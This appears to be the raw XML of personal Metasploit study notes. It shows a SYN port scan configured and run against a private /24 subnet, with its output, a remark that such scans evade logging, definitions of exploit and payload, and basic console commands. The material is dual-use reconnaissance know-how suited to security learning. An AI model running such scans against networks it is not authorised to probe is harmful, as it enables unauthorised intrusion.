          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46768CD9" wp14:editId="02C66D01">
            <wp:extent cx="5486400" cy="57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71500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C7" w:rsidRDefault="00B216C7">
      <w:r>
        <w:t>Now set ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF5D46" w:rsidRDefault="00B216C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D24A46D" wp14:editId="05BBCAA2">
            <wp:extent cx="4810125" cy="523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523875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D63AC" w:rsidRDefault="00EF5D46">
      <w:r>
        <w:t>Set thre</w:t>
      </w:r>
      <w:r w:rsidR="006260DA">
        <w:t>ads – speed limit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3015" w:rsidRDefault="009D63AC">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0682B7B7" wp14:editId="156EAB6B">
            <wp:extent cx="43053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190500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3015" w:rsidRDefault="009B3015">
      <w:r>
        <w:t>Now type run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B918FA" w:rsidRDefault="009B3015">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1698B668" wp14:editId="01245E7A">
            <wp:extent cx="5334000" cy="2809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2809875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2175" w:rsidRDefault="009F2175">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2175" w:rsidRDefault="009F2175">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F2175">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4B4F58"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>auxiliary/scanner/portscan/syn</w:t>
      </w:r>
      <w:r w:rsidRPr="009F2175">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4B4F58"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">  Module:</w:t>
      </w:r>
      <w:r w:rsidRPr="009F2175">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4B4F58"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4B4F58"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>This module will attempt to initiate a TCP/IP connection with ports on the victim machine. It is this done by sending a SYN packet, and if victim replies with a SYN/ACK packet that means the port is open. Then the attacker sends a RST packet, and as a result the victim's machine assumes that there is a communication error. The attacker now knows the state of port without a full tcp connection. Major benefit of TCP SYN scan is that most logging applications do not log the TCP/RST by default.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B918FA" w:rsidRPr="00FC6785" w:rsidRDefault="00B918FA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC6785">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Set interface and scan ports on entire interface </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msf &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="13C16A"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>use auxiliary/scanner/portscan/syn</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msf auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>syn</w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="13C16A"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>show options</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Module options (auxiliary/scanner/portscan/syn):</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Name       Current Setting  Required  Description</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       ---------------  --------  -----------</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BATCHSIZE  256              yes       The number of hosts to scan per set</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DELAY      0                yes       The delay between connections, per thread, in milliseconds</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INTERFACE                   no        The name of the interface</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JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.</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PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)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RHOSTS                      yes       The target address range or CIDR identifier</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SNAPLEN    65535            yes       The number of bytes to capture</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THREADS    1                yes       The number of concurrent threads</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xml:space="preserve">   TIMEOUT    500              yes       The reply read timeout in milliseconds</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msf auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>syn</w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="13C16A"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>set INTERFACE eth0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INTERFACE =&gt; eth0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msf auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>syn</w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="13C16A"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>set PORTS 80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PORTS =&gt; 80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msf auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>syn</w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="13C16A"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.1.0/24</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RHOSTS =&gt; 192.168.1.0/24</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msf auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>syn</w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="13C16A"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>set THREADS 50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THREADS =&gt; 50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msf auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>syn</w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="13C16A"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>run</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TCP OPEN 192.168.1.1:80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TCP OPEN 192.168.1.2:80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TCP OPEN 192.168.1.10:80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TCP OPEN 192.168.1.109:80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TCP OPEN 192.168.1.116:80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lastRenderedPageBreak/>
        <w:t>[*] TCP OPEN 192.168.1.150:80</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Scanned 256 of 256 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B918FA" w:rsidRPr="00B918FA" w:rsidRDefault="00B918FA" w:rsidP="00B918FA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="15" w:color="CECECE"/>
          <w:left w:val="single" w:sz="6" w:space="15" w:color="CECECE"/>
          <w:bottom w:val="single" w:sz="6" w:space="15" w:color="CECECE"/>
          <w:right w:val="single" w:sz="6" w:space="15" w:color="CECECE"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="1212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40" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B918FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>[*] Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B918FA" w:rsidRDefault="00B918FA"/>
    <w:p w:rsidR="008867EE" w:rsidRPr="00B00FCF" w:rsidRDefault="008867EE">
      <w:r w:rsidRPr="00B00FCF">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F47F7" w:rsidRDefault="002F47F7" w:rsidP="00A62D84"/>
    <w:p w:rsidR="002E1C77" w:rsidRPr="00A62D84" w:rsidRDefault="002E1C77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A62D84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00092" w:rsidRDefault="00F00092">
      <w:r w:rsidRPr="00F00092">
        <w:t>https://www.tutorialspoint.com/metasploit/metasploit_quick_guide.htm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6E47" w:rsidRDefault="000E6E47">
      <w:r>
        <w:t>Link to download metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA0FF2" w:rsidRDefault="00456CD5">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="002C2A4E" w:rsidRPr="00D926AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.metasploit.com/docs/development/maintainers/downloads-by-version.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00512DA5" w:rsidRDefault="00512DA5" w:rsidP="00512DA5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Vulnerability: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>It is a weakness in a computer system that could be exploited by an attacker to perform unauthorized malicious actions. It can be as simple as weak or no password and as complex as a Cross-Site Scripting or buffer overflows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00512DA5" w:rsidRDefault="00512DA5" w:rsidP="00512DA5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Exploit: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">An exploit is a piece of code that takes advantage of a vulnerability that is present in a computer system to cause unintended </w:t>
      </w:r>
      <w:r w:rsidR="00D51FA4">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>behaviour</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a computer system like gaining unauthorized access to a network or getting the privilege escalated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00512DA5" w:rsidRDefault="00512DA5" w:rsidP="00512DA5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> A payload is like an engine that defines to perform specific functions for the exploit which took place. It could be installing malware such as worms or viruses which performs the malicious actions or gaining the reverse shell to the compromised system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00512DA5" w:rsidRDefault="00512DA5">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA0FF2" w:rsidRDefault="00AA0FF2">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0FF2">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA0FF2" w:rsidRDefault="00D170A9" w:rsidP="00D170A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Help – list all the commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D170A9" w:rsidRDefault="007C79A1" w:rsidP="00D170A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Msfupdate – update the metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B407A" w:rsidRDefault="004B407A" w:rsidP="00C229FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="144" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007957FA">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:r w:rsidR="007957FA">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="007957FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Search</w:t>
      </w:r>
      <w:r w:rsidRPr="007957FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a powerful command in Metasploit that you can use to find what you want to locate. For example, if you want to find exploits related to Microsoft, then the command will be </w:t>
      </w:r>
      <w:r w:rsidR="00645EEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00645EEC" w:rsidRPr="007957FA" w:rsidRDefault="00645EEC" w:rsidP="00645EEC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="120" w:after="144" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B407A" w:rsidRDefault="004B407A" w:rsidP="004B407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bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B407A">
        <w:rPr>
          <w:rFonts w:ascii="var(--bs-font-monospace)" w:eastAsia="Times New Roman" w:hAnsi="var(--bs-font-monospace)" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>msf &gt;search name:Microsoft type:exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007230DB" w:rsidRDefault="007230DB" w:rsidP="004B407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bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007230DB" w:rsidRDefault="007230DB" w:rsidP="004B407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bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="3057525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1" name="Picture 1" descr="Sear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Comma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57525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00645FA9" w:rsidRPr="004B407A" w:rsidRDefault="00645FA9" w:rsidP="004B407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n-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B407A" w:rsidRPr="00C33BD8" w:rsidRDefault="00645FA9" w:rsidP="00645FA9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
